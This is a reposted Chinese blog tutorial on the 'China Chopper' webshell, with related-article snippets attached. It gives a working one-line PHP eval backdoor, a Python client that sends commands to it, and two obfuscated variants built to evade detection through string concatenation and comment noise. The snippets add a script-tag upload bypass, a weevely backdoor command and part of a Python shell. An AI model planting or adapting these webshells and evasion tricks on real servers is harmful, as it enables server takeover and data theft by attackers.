关于中国菜刀,如何"切菜"

最新推荐文章于 2021-04-01 20:09:10 发布
最新推荐文章于 2021-04-01 20:09:10 发布
阅读量116 收藏
点赞数
原文链接:http://www.cnblogs.com/MiWhite/p/7079486.html
版权

介绍

  经典标题党,中国菜刀有大牛已经分析过了->传送门(http://blog.csdn.net/p656456564545/article/details/49671829)。博主PHP刚接触,所以有了下文...

0x00  菜

关于一句话木马肯定是眼熟能详,一句话木马如下:

<?PHP eval($_GET[w]);?>

0x01  刀

一把西瓜刀如下:

# -*-coding=utf-8-*-
#!/usr/bin/env python

import sys
import requests


def encodePayload(payload):
    #请尽情蹂躏payload
    return str(payload)


cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text

 

本质上算是代码注入。

0x02 如果进行绕过呢?

需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。

博主初学PHP思路有限,所以去百度过期的栗子一枚。

<?php
    $arr = array('a','s','s','e','r','t');
    $func = '';
    for($i=0;$i<count($arr);$i++) {
    $func .= $func . $arr[$i];
    }
    $func($_REQUEST['c']);
?>

畸形栗子一枚,定睛看了栗子半分钟。

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/11/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

 

转载于:https://www.cnblogs.com/MiWhite/p/7079486.html

weixin_34138377
关注
菜刀如何连接mysql_中国菜刀之终端操作及数据库管理
weixin_29798625的博客
02-10 2937
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1866
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
渗透利器 | 常见的WebShell管理工具
热门推荐
03-02 2万+
攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,然后再执行系统命令、权限提升、读取配置文件、窃取用户数据,篡改网站页面等操作。本文介绍十款常用的We...
利用python模拟菜刀反弹shell绕过限制
weixin_30240349的博客
06-25 175
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',66...
中国菜刀使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5670
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
Python knife 一款伪菜刀
浅笑996的博客
12-05 1427
Python knife ​ 一款伪菜刀。 ​ 设计之初,本想只写个命令行的就可以了,但又想与众不同,想用python写代码,又不想用c#写前端(c#太卡了),万分无奈之下,找到一个替代品,Pyqt,所以我这个简易的菜刀就由此开始了。本程序实在python3下开发的。GUI界面用的Pyqt模块 既然想用pyqt做界面,第一步就是先装好pyqt, Python knife介绍视频 htt...
技术剖析中国菜刀原理
p656456564545的专栏
11-06 5551
referer:http://www.cnblogs.com/LittleHann/p/3247106.html 用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验
电信设备-可调距、等距移动的切菜刀.zip
09-14
"电信设备-可调距、等距移动的切菜刀"这一主题揭示了一个跨领域的创新应用,将电信技术与家用设备巧妙结合。这款切菜刀的设计灵感可能源于自动控制、精确测量和机械工程等领域,这些都是现代电信技术的基础组成部分...
中国菜刀拿下服务器权限
liu3jie66的博客
12-31 1626
实验要求:Iiswriter结合菜刀,iis6.0 完成通过put方法拿下服务器权限 实验道具:一台windows2003虚拟机 物理机 实验环境:物理机和虚拟机之间可以ping通 实验步骤: 在虚拟机上安装iis服务器 打开iis服务器,对默认的网站属性进行设置,开启主目录的所有权限 开启网站文件夹的所有权限 在物理机安装iiswrite,这个解压文件就可以看到...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 898
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
kali中的中国菜刀weevely
司令2017的博客
04-17 2万+
weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行。     weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是
科迅免杀php一句话_那些强悍的PHP一句话后门
weixin_39526872的博客
12-21 306
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的 PHP一句话 后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was...
2020-10-22-python总结
持菜刀,行走江湖
10-22 119
python学习总结-01 知识扩充 1.讲解了 pyhon的作用以及发展史,运维核心竞争力是会开发 2.讲解了二进制字符编码发展史 ASCII 255 1bytes(不支持中文) ----》gb23112(表示中文)---》GBK1.0 (汉字数量增加)-----》GB18030(汉字数量增加) unicode (万国码 英文不好存放)---->utf-8 中英文可以存 存储规则en:1byte,zh:3byte python开发 1.讲解了定义变量,取变量的3种方式,一般使用..
切菜刀法16种
weixin_30640291的博客
07-06 2214
切菜刀法16种 ...
基于asp.net的工作流程审批系统设计与实现.docx
09-30
基于asp.net的工作流程审批系统设计与实现.docx
这是各种对象检测数据集的预处理相关工具脚本的集合.zip
最新发布
09-30
这是各种对象检测数据集的预处理相关工具脚本的集合
基于asp.net的驾校理论考试网上模拟系统设计与实现.docx
09-30
基于asp.net的驾校理论考试网上模拟系统设计与实现.docx
基于Python与Shell的阿里巴巴智能运维竞赛排名14设计源码
09-30
该项目为阿里巴巴智能运维竞赛排名14的设计源码,采用Python和Shell两种编程语言,共包含27个文件,包括2个Python脚本、1个PDF文档、1个Markdown文件、1个文本文件、1个CSV文件、1个Shell脚本以及5个特定数据模型文件。该解决方案旨在提升运维效率,适用于大型企业的智能运维场景。
buuctf菜刀666
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值